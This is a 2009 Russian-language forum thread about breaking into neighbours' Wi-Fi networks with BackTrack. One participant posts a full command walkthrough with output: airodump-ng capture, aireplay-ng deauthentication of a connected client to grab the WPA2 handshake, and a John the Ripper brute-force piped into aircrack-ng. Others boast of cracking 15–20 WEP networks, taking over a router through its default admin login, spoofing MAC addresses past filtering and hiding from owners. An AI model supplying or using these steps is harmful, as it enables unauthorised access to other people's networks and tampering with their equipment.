Привет. Спасибо тебе! Перевёл я карту в режим мониторинга. И сново появилась проблема!Когда я прописываю путь bt# /usr/bin/lzm2dir/mnt/sde1/spoonwep2.lzm/ и bt# /usr/bin/lzm2dir/mnt/sde1/SWPA.lzm/ мне пишет Not a directory! Что это может быть? Я пробывал как с usb так и с системы эти файлы прописывать но ничего не получилось! А когда я захожу в K/backtrack/Radio Network Analysis/80211/All/ то у меня там можно увидеть только Spoonwep! А вот Spoonwep2 и Spoonwpa вообще нет!!! Может чё подскажешь или ещё кто знает?
Semby68
Привет. Спасибо тебе! Перевёл я карту в режим мониторинга. И сново появилась проблема!Когда я прописываю путь bt# /usr/bin/lzm2dir/mnt/sde1/spoonwep2.lzm/ и bt# /usr/bin/lzm2dir/mnt/sde1/SWPA.lzm/ мне пишет Not a directory! Что это может быть? Я пробывал как с usb так и с системы эти файлы прописывать но ничего не получилось! А когда я захожу в K/backtrack/Radio Network Analysis/80211/All/ то у меня там можно увидеть только Spoonwep! А вот Spoonwep2 и Spoonwpa вообще нет!!! Может чё подскажешь или ещё кто знает?
по командам видно что пропустил несколько пробелов,
проще скопируй команды в блокнот и его скинь на usb, и с блокнота копируй команды в консоль и запускайся ,если ты правильно написал что твоё usb отобразилось sde1
то,
airmon-ng
airmon-ng start rausb0 { в место rausb0 твой драйвер wi-fi карты}
/usr/bin/lzm2dir /mnt/sde1/spoonwep2.lzm /
/usr/bin/lzm2dir /mnt/sde1/SWPA.lzm /
смотри всё тоже но после lzm2di пробел и после .lzm пробел.Да и ещё если usb будешь вытаскивать вставлять то буква будет меняться , например sde1 ,sdb1 ,sdd1,и тд. А потом ищешь как и раньше. Вроде ошибки не должно быть. Удачи !!!
Semby68
Спасибо, попробую! И ТЕбе удачи во всех твоих делах!!!
Semby68
Спасибо, попробую! И ТЕбе удачи во всех твоих делах!!!
если очень заинтересовал ВТ-3 ?
могу отписать команды на взлом WEP с консоли , это быстрее подберёшь ключ чем / Spoonwep2.lzm / !!!
semby68
Semby68
Привет, если можешь опиши. В ВТ-3 всё получилось с командами прописать путь к файлам!Спасибо! Ещё вопросик есть. Как взломать сети WiFi с WPA2, WPA2-TSK, WPA-PSP, и т.д?Просто возле меня их много и многие вот с таким шифрованием.Или их не как нельзя!
Как взломать сети WiFi с WPA2, WPA2-TSK, WPA-PSP, и т.д?Просто возле меня их много и многие вот с таким шифрованием.Или их не как нельзя!
Статьи почитать не судьба?
Статьи почитать не судьба?
есть кое что ! но это с ВТ-4 , сам пробую WPA взломать но пока в ожидании , у парня сетка висит WPA а рядом больше ничего нет , так вот уже вторые сутки ВТ-4 крутит, и пока ожидаем результат, по словарям её не вскрыли ,пробуем то что есть в самом ВТ-4.
если хочешь попробуй !
скачай ВТ-4 ISO и залей на USB или на CD .
Вход в ВТ-4 Login # root дави Enter
# toor дави Enter
# startx дави Enter
Переводишь карту в режим мониторинга.
команды которые отпишу закинь в блокнот и блокнот скинь на USB . но когда начинается загрузка ВТ-4 USB должно сразу стоять в компе иначе его не откроешь
потом ищи его системе ВТ-4 если не знаешь как ,то просмотри весь ВТ-4 я думаю что найдёшь.
Не забудь о правильном копирование или создании команд , иначе Default
Для начала переводим карту в режим "monitor mode" :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
(monitor mode enabled on mon0)
Сделано, и теперь мы можем использовать карту как mon0
Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Остановите airodump-ng и запустите его заново, записывая все пакеты в файл: остановить клавиши Ctrl +C , нажать обе.
и запускаем заново
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Остановите airodump-ng и убедитесь что все необходимые файлы созданы
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
вроде всё так , пробуй , может повезёт . удачи !!!
Спасибо, попробую. А ты если можешь , отпишись, получилось взломать WPA с помошью ВТ-4! Очень интересно! А вот у меня пока ещё ничего не получилось!Не могу взломать никакую сеть хотя всё вроде правильно делаю, пробую каждый день понемногу, а так хочется!
Semby68
Привет. Скажи мне пожалуйста, у тебя получалось взломать WPA или WEP? Я почемуто не могу не какую взломать! Есть и WPA,WPA2 и причём не одна. Есть WEP скрытая, пытался сначало поломать её ,сделал так как ты всё описал,но так ничего и не добился!Может я мало пакетов собираю? Самое большее собрал 250000 примерно!Потом пытался WPA поломать, тоже не чего!Никак не могу впоймать handshake! Рядом с сетью нет клиента, второй способ не помог как ты описывал! Чё мож не так делаю, всё вроде делаю так как ты описал!
Semby68
Привет. Скажи мне пожалуйста, у тебя получалось взломать WPA или WEP? Я почемуто не могу не какую взломать! Есть и WPA,WPA2 и причём не одна. Есть WEP скрытая, пытался сначало поломать её ,сделал так как ты всё описал,но так ничего и не добился!Может я мало пакетов собираю? Самое большее собрал 250000 примерно!Потом пытался WPA поломать, тоже не чего!Никак не могу впоймать handshake! Рядом с сетью нет клиента, второй способ не помог как ты описывал! Чё мож не так делаю, всё вроде делаю так как ты описал!
WEP сети которые у меня видны я все поломал , даже у родственников в другом городе в ВТ-3 это гдето 15-18 сеток прогой Spoonwep2.lzm,эта прога должна сама определить сколько ей надо пакетов автоматом и выдать тебе ключ ,посмотри внимательно видео , в этой проге атаки можно менять , может мало ждал?
с WPA пока не чего не получается не по словарям не другой командой ,пока собираю словари и другое описание на взлом.
Semby68
Добрый день. Вот я смотрю у тебя когда ты переводишь свой адаптер WiFi мониторить отображается название твоего адаптера WiFi. Это когда ты пишешь в консоли airmon-ng! Я так понял ты используешь USB адаптер?! У меня почему то отображается только wifi0,ath0,ath1! а вот самого точного названия нет! Я выбираю wifi0 всё работает,также и остальные ath0,ath1, сети карта видит!Вопрос, обязательно должно определятся название моей PCI карты WiFi?
забыл довавить!Адаптер которые я вижу: wifi0 » Atheros » madwifi-ng и другая ath0 » Atheros » madwifi-ng VAP ( parent: wifi0 ), а вот PCI адаптера wifi названия нет!
забыл довавить!Адаптер которые я вижу: wifi0 » Atheros » madwifi-ng и другая ath0 » Atheros » madwifi-ng VAP ( parent: wifi0 ), а вот PCI адаптера wifi названия нет!
смотри сюда ты наверно мало читал статей
# airmon-ng - Enter
отображается твой адаптер wifi0 и ath0 ,
чтоб перевести твою карту в режим мониторинга надо набирать команду !
# airmon-ng start wifi0 - Entr
получишь драйвер мониторинга wifi карты ath1 он и является (monitor mode enabled on ath1)
# airodump-ng ath1
только с этим драйвером ты можешь собирать пакеты
Totoshka35
22.05.2009, 21:49
Всем привет. Попал в такую ситуацию, может кто подскажет выход =) Есть открытая сетька без шифрования, я к ней спокойно подрубался раньше. Ради прикола решил подрубится к роутеру, ввёл айпишник его, ввёл стандартные логин и пароль - и пустило. В связи с частымипадениями скорости инета через данную сеть у меня, решил поиграться с фильтрацией МАС адресов. С удивлением обнаружил, что помимо меня к этой сети подрубаются ещё человек 10. Внёс их МАС-и в список, поставил галочку запрет. Всё стало пошустрее, но почему-то последние 2 МАС-а продолжали беспрепятственно сидеть в сети, и через пару дней. Решил пойти другим способом - внести мой МАС и МАС хозяина в список разрешённых. Для начала удалил все МАС-и, и поставил галочку разрешить заранее.. Не внеся ни один МАС в список. И вот теперь к сети не подрубится, ибо в списке для разрешения доступа нет ни одного МАС адреса! Что можно сделать в данной ситуации?? Пробовал МАС, состоящий из одних нулей - не подключает. Есть какая-то возможность подрубится к данной сети?? ХОтя бы для изменения настроек роутера на по умолчанию???
Semby68
Спасибо.А ты не знаешь как насчёт того допустим если я подключусь с сети это могут увидеть?и другие тоже могут видеть мой адаптер?
Semby68
Спасибо.А ты не знаешь как насчёт того допустим если я подключусь с сети это могут увидеть?и другие тоже могут видеть мой адаптер?
Адаптор нет,но то что ты подключен к сетке ,то да!
Я пол года вишу на одной сетке и всё нормально , нет проблем .Нашол в инете как сделать антэну WI-FI ,переделал свой адаптор под внешнюю антэну и нормально.Узнал как можно шифронуться в сети !
Но сильно не исчезнешь , есть проги ,типа сканеров ,WI-fi радаров, да и через Back-Track видно к какой сетке подрублен комп ,и сколько компов висит на сетке!Опытный пользователь Шифрует свою сеть в WPA ,скрывает ESSID,шифрует пакеты и тд. Но их не сильно много,в основном сами висят где нибудь, есть сеть пользуйся,но не расслабляйся, повышай навыки , только в практике можно достичь нормального результата .Прогресс идёт в перёд и нам надо двигаться .
Да может для простого пользователя я и шифронулся,да мне по барабану , несколь раз выкидывали меня с сетки, но я прописал IP адр. и DNS в ручную и в роуторе сменил пароль admin на свой и он согласился, чтоб я был клиентом этой сети! Удачи Semby. Spain
Всем привет. Попал в такую ситуацию, может кто подскажет выход =) Есть открытая сетька без шифрования, я к ней спокойно подрубался раньше. Ради прикола решил подрубится к роутеру, ввёл айпишник его, ввёл стандартные логин и пароль - и пустило. В связи с частымипадениями скорости инета через данную сеть у меня, решил поиграться с фильтрацией МАС адресов. С удивлением обнаружил, что помимо меня к этой сети подрубаются ещё человек 10. Внёс их МАС-и в список, поставил галочку запрет. Всё стало пошустрее, но почему-то последние 2 МАС-а продолжали беспрепятственно сидеть в сети, и через пару дней. Решил пойти другим способом - внести мой МАС и МАС хозяина в список разрешённых. Для начала удалил все МАС-и, и поставил галочку разрешить заранее.. Не внеся ни один МАС в список. И вот теперь к сети не подрубится, ибо в списке для разрешения доступа нет ни одного МАС адреса! Что можно сделать в данной ситуации?? Пробовал МАС, состоящий из одних нулей - не подключает. Есть какая-то возможность подрубится к данной сети?? ХОтя бы для изменения настроек роутера на по умолчанию???
Я думаю надо подождать, если и хозяин не может войти в инет ,то он должен что-то предпринять!
Totoshka35
23.05.2009, 16:02
Всё, конесно, логично, стоит подождать. Но меня просто беспокоит то, что как бы не навели на хозяина такие проблемы о некоей, мягко говоря незащищённости его точки доступа и не появилась она уже в обновлённом виде с шифрованием впа2. Хотелось бы просто скорее вернуть всё на свои места, пока он это не просёк
Кто знает, влияет ли качество сигнала на взлом WiFi?
_SEREGA_
24.05.2009, 14:14
Кто знает, влияет ли качество сигнала на взлом WiFi?
При проведение атак с пакетной инъекцией оч. даже сильно влияет. При слабом сигнале те атаки не получатся. Тестируй aireplay-ng -9 device. Кстати на некоторых картачках можно регулировать сигнал с помощью iwconfig
Люди, хелп!
Помогите подобрать карточку (и главное не ошибиться), которая будет поддерживаться и BackTrack 3 и KisMac!
В карте раздела есть статья по адаптерам пригодным для вардрайвинга, вот там и смотри.
В карте раздела есть статья по адаптерам пригодным для вардрайвинга, вот там и смотри.
да, но проблема в том, что одна и таже карта может и не поддерживаться одновременно и KisMac-ом и BT3
_SEREGA_
Спасибо.Можешь написать как регулировать сигнал с помошью iwconfig,точнее где зто прописать надо?
Scorpion.
26.05.2009, 09:11
boykent, ты что используеш,backtrack? тогда пиши в консоль iwconfig eth0 txpower auto
потом iwconfig eth0 txpower 20
1-ая команда включает управление мощностью
2-ая устанавливает мощность в дециБелах.
eth0 - это девайс твой
Не во всех картах есть возможность управлением мощности.
trup_slona
26.05.2009, 09:34
У меня windows XP SP2, адаптер atheros AR5007EG. С помощью стандартного виндового сканера ничего не находится. Сканировал эфир через Network Stumbler, он всегда находит только одну скрытую точку с шифрованием. Скачал вчера CommView for WiFi, запустил сканирование, он тоже нашел эту точку и еще одну, которую не находит Network Stumbler. Первая точка на 11 канале, вторая на 13. На второй шифрования нет, ssid известен, но она скрытая.
Вопросы:
1) Почему Network Stumbler не находит вторую точку?
2) Как можно подключиться к скрытой точке? Добавлял сеть в список предпочитаемых, ничего не происходит.
Scorpion.
26.05.2009, 09:42
У меня windows XP SP2, адаптер atheros AR5007EG. С помощью стандартного виндового сканера ничего не находится. Сканировал эфир через Network Stumbler, он всегда находит только одну скрытую точку с шифрованием. Скачал вчера CommView for WiFi, запустил сканирование, он тоже нашел эту точку и еще одну, которую не находит Network Stumbler. Первая точка на 11 канале, вторая на 13. На второй шифрования нет, ssid известен, но она скрытая.
Вопросы:
1) Почему Network Stumbler не находит вторую точку?
2) Как можно подключиться к скрытой точке? Добавлял сеть в список предпочитаемых, ничего не происходит.
1) Netstumbler это простой сканер пакетов-маячков от точек. Эти маячки говорят будто " Я точка ххх подрубайтесь ко мне. А CommView это снифер,более серьёзная программа ктороая перехватывает весь трафик в воздузе от точек, тем самым определя и скрытые точки,которые не отсылают моячки чтоб об из не узнали.
2)а тут Х.З. у каждого адаптера своя прога для подрубания,у меня например есть поле ввода скрытого имени для подключения к скрытой Т.Д.
может быть сигнал ещё слабый
trup_slona
26.05.2009, 11:35
Установил я прогу для управления своим адаптером. Запустил в ней сканер, нашел все ту же сеть без имени, а другой сети нет. Вводил ее ssid - безрезультатно. CommView for WiFi показывает что работают обе точки. Возможно ли что я не могу подключиться из-за фильтрации mac-адресов? Или могут быть еще другие причины?
Возможно ли что я не могу подключиться из-за фильтрации mac-адресов? Или могут быть еще другие причины?
Если стоит мак фильтрация то не подключишься, смотри какие маки у клиентов и когда кто то из них отключится смени мак и подключись к сети.
trup_slona
27.05.2009, 09:29
Постоянно наблюдаю за этой точкой, ни разу не видел чтобы компов там стало меньше. Куча протоколов по которым передаются какие-то данные, но tcp/ip встречается не часто. Не опнятно, толи в сети нет компов, а точка им чето шлет, типа опрашивает их, толи фиг знает.. Такое может быть? И другой вопрос, что если я укажу мак-адрес компа который сейчас в сети, смогу ли я тогда подключиться и не произойдет ли конфликт? Не хочется просто чтобы заметили что кто-то к ним бурится и не поставили шифрование.
По ходу в сети никого нет, так как ни разу не было ни одной сессии. Вот такой скриншот:
http://s60.radikal.ru/i169/0905/56/2ab12b538fe2.jpg (http://www.radikal.ru)
Scorpion.
27.05.2009, 12:20
Да действеительно ip шников много,большая сетка.
Если ты подставиш МАК какогонить клиента себе, то будет конфликт.1-ая ситуация:
Если в момент того как ты будеш подрубаться к сетке с чужим МАК-ом , и в это время будет подключен клиент к сетке с тем МАК-ом каторый ты себе присвоиш. то ты вероятно не подрубишся к ней. т.к. 2 одинаковых МАКа не может быть одновременно.
2-ая ситуация:
Если в момент того как ты будеш подрубаться к сетке с чужим МАК-ом , и в это время НЕ БУДЕТ подключен клиент к сетке с тем МАК-ом,то ты подключишся, но настоящий клиент потом не подрубится(когда ты сидиш).
Scorpion.
Спасибо, попробвал настроить карту, ничего не получилось! Видно карта не подходит для регулировки!
Привет Всем!Есть вопрос! Звучит значит так: Есть точка доступа с шифрованием WEP,на ней есть интернет, знаю ключ,с кпк пробовал подключится всё получается и скорость приличная!Хочу подключится с компьютера специально сделал направленную антену ФА20,впоймал сеть которая нужна но сигнал слабенький.Вопрос : как подключится к этой сети,какие настройки нужны в компьютере ??? для Windows Xp.Спасибо
AntikasS
01.06.2009, 04:09
Привет Всем!Есть вопрос! Звучит значит так:
А что не получается, когда подключаешься с помощью твоей утилы, или стандартной Xp-шной?
AntikasS
Уже получилось подключится с помощью проги Hopper,пришлось провод подрезать в половину раза!Вот только теперь не в прикол сидеть в ванной с компом....аж смешно!
По другому не как,так как окна ванной и кухни выходят во двор(живу в частном доме),а за стенкой ещё и соседи!Другие три окна выходят на улицу,там тоже не как не подцепишь антену,обарвут!МОЖЕТ КТО ЕЩЁ ЗНАЕТ КАК МОЖНО УСИЛИТЬ ПРИЁМ АНТЕНЫ?????чТОБ Я СМОГ ЕЁ НА ЧЕРДАК ЗАПИХНУТЬ!
AntikasS
02.06.2009, 17:16
Ну во-первых нашел статейку по поводу твоей антенны: http://www.wifiantenna.org.ua/antennas/fa-20/
Там написано, как чел использовал сразу 2 антенны, и тем усилил сигнал до 10 км. Может это и бред.
4ikotillo
02.06.2009, 19:23
AntikasS
Уже получилось подключится с помощью проги Hopper,пришлось провод подрезать в половину раза!Вот только теперь не в прикол сидеть в ванной с компом....аж смешно!
По другому не как,так как окна ванной и кухни выходят во двор(живу в частном доме),а за стенкой ещё и соседи!Другие три окна выходят на улицу,там тоже не как не подцепишь антену,обарвут!МОЖЕТ КТО ЕЩЁ ЗНАЕТ КАК МОЖНО УСИЛИТЬ ПРИЁМ АНТЕНЫ?????чТОБ Я СМОГ ЕЁ НА ЧЕРДАК ЗАПИХНУТЬ!
Можно попробовать через промежуточную точку, но довольно дорого.
Totoshka35
04.06.2009, 21:56
Народ, у меня такой вопрос! Есть комп, подключённый к точке с впа2 шифрованием. Имеется физический доступ к компу, но неизвестен пароль для подключения к точке. Можно как-то его узнать при физическом доступе к компу???
Добрый день всем!Спасибо большое за ответы Всем!
4ikotillo
А можешь расказать что из себя представляет промежуточная точка доступа?у меня впринципе сейчас подключён комп к точке,но мне пришлось его перенести на кухню!Нельзя ли купить какюю нибудь точку доступа чтоб она находилась на кухне подключённая к антене ФА20 и ловила ту точку на которой я сейчас сижу,а потом что ещё и отдавала этот сигнал по wifi в пределах моего дома?
AntikasS
05.06.2009, 16:45
4ikotillo привет! boykent, я правильно понимаю, у тебя ситуация такая: ФА-20 на кухне ловит сигнал и по антенному проводу сигнал(чем короче провод - тем сигнал сильнее) идет в точку доступа, из которой обычный LAN провод идет напрямик к компу, так? Если да, то покупаешь еще одну точку или роутер(если у тебе в квартире не одно Wi-fi устройство) где-то за 2000 деревянных, вешаешь на нее твой LAN провод и будет Wi-fi по всей квартире. Народ, поправьте, если я что-то не так сказал.
Shephard
05.06.2009, 19:58
Всем привет.
Интересует понятие "Стерилизатор", естесственно в контексте 802.11 :)
Интересует сам принцип его работы, либо, если это баг железа, то какими факторами обусловлен. У буржуев по поводу Стерилизатора ровным счётом ничего нет.
Кое какая инфа есть на наге.ру, но там описаны последствия применения.
Вообще, инересуют так же любые наработки по поводу нестандартных режимов работы 802.11 железа, например:
- изменение кода Баркера, если это практически осуществимо.
- ручное управление PLL RF синтезатором сетки частот 802.11 карты.
- так же возможность входа в режим непрерывного излучения несущей (CW).
-итд.
AntikasS
05.06.2009, 21:08
Всем привет.
Интересует понятие "Стерилизатор", естесственно в контексте 802.11 :)
Интересует сам принцип его работы, либо, если это баг железа, то какими факторами обусловлен. У буржуев по поводу Стерилизатора ровным счётом ничего нет.
Кое какая инфа есть на наге.ру, но там описаны последствия применения.
Посмотри здесь (http://www.pps.ru/catal/fg-lgs702.html). Вообще мне тоже стало интересно. Это просто-напросто глушитель сигнала (в твоем случае Wi-fi). Вообще если тебе так интересно забей в поисковик глянь на специализированных форумах.Принцип действия генератора основан на излучении шумового сигнала от автогенератора и подачи этого сигнала на выход антенны Тут (http://www.gsmblock.ru/psvideo.php) тоже можно почитать о подобном приборе.
Shephard
05.06.2009, 22:00
нет, стерилизатор, это не совсем глушитель сигнала. Это фича железа 802.11, которая в силу своей глючности от ума разработчиков, или же сознательно внедрённая функция(никто однозначно не знает).
Вобщем, то что я знаю - это то, что Стерилизатор запускался на некоторых Длинковских точках доступа и карточках. Позднее разработчик вроде как прикрыл эту хрень.
Больше информации нет.
То есть это ЯВНО не постановщик помех, как по приведённым Вами ссылкам(эти устройства имеют к 802.11 только косвенное отношение - это диапазон частот) и глушат всё и вся на частотах 2,4 ГГц.
Вот скажите, если заставить устройство 802.11 постоянно излучать преамбулу в эфир, другие будут по ней синхронизироваться с передающим эту преамбулу устройством и ждать её окончания? Просто есть кое-какие догадки...
AntikasS
06.06.2009, 00:48
Стерилизатор запускался на некоторых Длинковских точках доступа и карточках. Позднее разработчик вроде как прикрыл эту хрень. Кстати, читал на форумах про это. Вот (http://wireless.net.ua/pipermail/wireless-ru/2004-May/004118.html) нечто про это и вот (http://www.hub.ru/forum/index.php?showtopic=15144&st=390) , признаюсь сразу: я не во все въехал. Да, кстати, мне меньше 25 и можно\нужно ко мне на ты. Насчет вышемнойпредложенного действительно, оно глушит всё в заданном диапазоне.
4ikotillo
06.06.2009, 05:23
Добрый день всем!Спасибо большое за ответы Всем!
4ikotillo
А можешь расказать что из себя представляет промежуточная точка доступа?у меня впринципе сейчас подключён комп к точке,но мне пришлось его перенести на кухню!Нельзя ли купить какюю нибудь точку доступа чтоб она находилась на кухне подключённая к антене ФА20 и ловила ту точку на которой я сейчас сижу,а потом что ещё и отдавала этот сигнал по wifi в пределах моего дома?
Читай http://forum.ixbt.com/topic.cgi?id=14:49123 и http://www.meta-ru.ru/doc/my/wifi.jpg&imgrefurl=http://www.meta-ru.ru/doc/my/jig_wifi.html&usg=__oZBVwcxc_HmzS2GNkT6DfmqFCNE=&h=803&w=778&sz=63&hl=ru&start=107&tbnid=fT8NySbgPplpjM:&tbnh=143&tbnw=139&prev=/images%3Fq%3Dwifi%2B%25D0%25B0%25D0%25BD%25D1%2582 %25D0%25B5%25D0%25BD%25D0%25BD%25D0%25B0%26ndsp%3D 18%26hl%3Dru%26sa%3DN%26start%3D90%26newwindow%3D1
Дальше дело твоей фантазии, в идеале - поставить антенну на крышу, плюс точку доступа на прием, и уже витой парой подключить её к точке доступа в квартире, но это уже совсем геморой.
AntikasS
У Меня в компе стоит PC WiFi D-Link Wireless 108G DWA-520 adapter, напрямую подсоеденённая к антене ФА20,антена находится гдето в 4.5 метров от земли и провод соответственно 5 метров.Сижу на кухне скорость инета примерно от 90-220 кб/с прыгает,если я переношу комп в ту комноту в которой он и стоял скорость практически не падает,но скачать ничего не могу!приходится сёрфингом баловатся!!!
Вопрос: Если я поставлю промежуточную точку:она будет отдельно от компа работать?И мне сново придется подключатся с компа уже к промежуточной точке?А взлом других сетей возможен если: комп-промежуточная точка-точка доступа?Спасибо
AntikasS
06.06.2009, 20:58
А взлом других сетей возможен если: комп-промежуточная точка-точка доступа?Вообще-то форум Античат посвящен защите от взлома, а не наоборот. В общем так: тебе было бы оптимально, купить точку доступа с возможностью подключения антенны ФА-20 и протянуть от неё LAN до компа, но если у тебя ноут и ты любишь перемещаться по квартире с нетом(ну и ли какие там другие цели), то надо так:
ФА-20 - точка доступа - LAN - точка доступа(лучше роутер) - wi-fi - комп(или несколько, если роутер).]
AntikasS
Спасибо большое за совет!А как попасть на форум по моей теме?
AntikasS
06.06.2009, 23:12
AntikasS
Спасибо большое за совет!А как попасть на форум по моей теме?По теме взлома, методах и т.п. форумов нет, это запрещено законами РФ. Интересуешься построением Wi-fi, LAN да и вообще сетей, тебе дорога в Google. Книжка полезная на эту тему есть - Wi-фу (http://slil.ru/27733570), в ней написано о безопасности и принципах работы wi-fi сетей. Кстати, мог бы не тратить отдельного поста на благодарность, добавив очки в репутацию. Но это не обязательно. Каждый сам решает, как поступать. :)
Добрый день!Кто может подсказать по такому вопросу,вопрос не в тему,просто не знаю где спросить!Вопрос; у меня комп подключён к интернету через точку доступа WiFi, меня интересует как можно подключить комуникатор через wifi к моему компьютеру чтоб брать интернет уже с самого компьютера который уже подключён к точке? Имею PC адаптер D-Link DWA-520 стоит в компе и usb адаптер D-Link DWA-101?Извеняюсь за неуместный вопрос.
посканил сеть и нашел что то, как туда подключиться?ключ wlan неизвестен...
http://img200.imageshack.us/img200/7880/777z.png :confused:
Что то намудрил с перепайкой usb адаптера для выносной антены, теперь с антеной покзывает две одинаковые сети и в 2 раза хуже чем было? usb ASUS 167G
Только у меня антена чуть иначе чем показано на фото на этом сайте. Разрезал антену на плате в дыух местах и выпаял какойто кондюк
сылка на фото моего адаптера http://photofile.ru/users/dymka79/96073946/108024236/#mainImageLink
Всем спасибо за ответы
Shephard
10.06.2009, 18:53
dymka
ищи на плате землю. Она как правило имеет бОльшую площадь покрытия медной фольгой(GND), и антенный выход. Картинка не очень качестваенная и непонятно, как у тебя там нв оригинале антенна(родная) была. Если сделаешь качественный макроснимок той части платы, где антенна, то я тебе скажу куда подключать. Распаивать/разделывать кабель надо очень аккуратно, и как можно более короткими проводниками(центральная жила должна выходить и оплётки как можно более короткой, это снизит паразитные емкости и индуктивности).
Это 2,4 ГГц, Здесь 1 (один) миллиметр решает всё. Чуть в сторону - и система рассогласована.
Желательно брать кабель с фторопластовой изоляцией. Его паять проще.
Разделываешь так: Снимаешь внешнюю изоляцию, обрезаешь оплётку, не раскручивая её так, чтобы ценральная жила в изоляции торчала на 5-7 мм(некритично, но чем короче - тем лучше). Снимаешь с центр. жилы изоляцию на 1-2 мм, этого хватит чтобы припаяться к контактной площадке на плате. Естесственно лудишь центральную жилу.
Теперь лудишь аккуратно, без излишек припоя, оплётку, не раскручивая её. Кладешь её, оплётку, на землю платы(общий). Как? Трудно сказать, потому как тут надо отталкиваться от топологии платы...
Вобщем кидай макроснимок изображения.
Еще хорошо чтобы были хорошие глаза, можно близорукие, так чтобы четко видеть все мелкие детали/сопли на плате. От соплей тоже может хреново работать.
Так же после пропайки обязательно протереть плату в месте пайки смоченной спиртом ватой, удалив остатки флюса. Флюс может иметь не совсем приемлимые для СВЧ диэлектрические свойства, и, как следствие - ухудшение работы после модификации.
ок обязательно сделаю макруху и выложу сюда
1mm0rt3s
11.06.2009, 15:26
Всем привет, есть вопрос.
Существует ли программы, чтоб два компа по wi-fi передавали друг другу сигнал с вебкамер.
Желательно под линух но и под вин тож можно. спасиб зарание
presidentua
11.06.2009, 16:23
После Aircrack получил пароль в HEXе [ 12:34:5A:BC:DE ], а теперь пробую подконектиться а меня виндовс7 спрашивает серкетный ключ. ПОдскажите в в каком формате его вводить чтобы она восприняла ключа именно как HEX.
Спасибо. Не думал что так просто. А я пробую то в формате 0x , то c % и т.д. )))
jawbreaker
11.06.2009, 16:45
Убери двоеточия и вводи.
Добрый день! Кто может подсказать,пытаюсь подобрать ключ к точке с шифрованием WEP! Пакеты собираю прогой CommView for Wifi, подобраю aircrack-ng-1.0-rc1-win и не только этой версией пробовал, собрал 3000000 пакетов но так ключ и не подобрал! Пробовал также и через ВТ-3,ничего!Что можете подсказать?
Вот макро снимок usb адаптера http://photofile.ru/users/dymka79/96075730/108084395/#mainImageLink
KaZ@NoVa
12.06.2009, 21:56
Добрый день!Кто может подсказать по такому вопросу,вопрос не в тему,просто не знаю где спросить!Вопрос; у меня комп подключён к интернету через точку доступа WiFi, меня интересует как можно подключить комуникатор через wifi к моему компьютеру чтоб брать интернет уже с самого компьютера который уже подключён к точке? Имею PC адаптер D-Link DWA-520 стоит в компе и usb адаптер D-Link DWA-101?Извеняюсь за неуместный вопрос.
НА компе установить программу CCproxy , прочитай как настроить, и будет на коммуникаторе интернет :)
[QUOTE=boykent]Добрый день! Кто может подсказать,пытаюсь подобрать ключ к точке с шифрованием WEP! Пакеты собираю прогой CommView for Wifi, подобраю aircrack-ng-1.0-rc1-win и не только этой версией пробовал, собрал 3000000 пакетов но так ключ и не подобрал! Пробовал также и через ВТ-3,ничего!Что можете подсказать?[/QUOT
а spoonwep2 .lzm в ВТ-3 не помог ? я уже 20 если не больше с этой прогой вскрыл !
Shephard
13.06.2009, 17:38
Вот макро снимок usb адаптера http://photofile.ru/users/dymka79/96075730/108084395/#mainImageLink
http://pic.ipicture.ru/uploads/090613/TVjbnV2EvS.jpg
старайся как можно аккуратнее сделать, потому что на СВЧ на соединениях большое затухание. Чем меньше будет торчать проволоки в стороны, тем лучше. То, что у тебя на фото - не совсем правильно.
Спасибо не знал что микроны надо ловить :) а по чему две сети стал ловить может потому что антена не замкнута?
KaZ@NoVa спасибо!
Semby68
С помощью spoonwep2.lzm нечего не получилось!С тремя сетками пробовал!А как там у тебя с WPA? А как словари делать?А то я скачал а они в формате .txt!
KaZ@NoVa спасибо!
Semby68
С помощью spoonwep2.lzm нечего не получилось!С тремя сетками пробовал!А как там у тебя с WPA? А как словари делать?А то я скачал а они в формате .txt!
с WPA ничего не получилось !
а на WEP , попробуй с консоли в ВТ-3, вот видео
http://guruadmin.ru/page/vzlamyvaem-wi
посмотри внимательно !
